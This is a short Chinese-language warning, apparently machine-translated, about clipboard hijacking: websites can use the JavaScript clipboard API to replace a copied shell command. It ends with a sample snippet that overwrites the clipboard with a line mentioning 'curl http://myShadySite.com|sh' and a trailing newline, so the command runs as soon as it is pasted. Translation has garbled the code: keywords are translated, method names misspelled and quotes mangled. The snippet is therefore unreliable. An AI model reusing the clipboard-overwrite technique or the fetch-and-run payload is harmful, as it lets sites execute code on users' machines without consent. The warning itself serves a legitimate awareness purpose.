当您在Internet上看到shell命令时,不要将其复制到您的终端中。
现代JavaScript剪贴板API允许网站在没有用户确认或许可的情况下简单地覆盖您放在剪贴板中的内容。
以下是执行此攻击有多么容易的一个示例。假设下面的红色文本是您要使用的shell命令。
请注意,您甚至不必在粘贴后在终端中按Enter键即可利用漏洞。有效负载很方便地包含了一个尾随的换行符,它可以为您做这件事!
Document.getElementById(';copyme';).addEventListener(';copy';,函数(E){e.clipboardData.setData(';TEXT/PLAN';,';ECHO";这可以是[CURL http://myShadySite.com|sh]";\n';);e.PrevenentDefault();});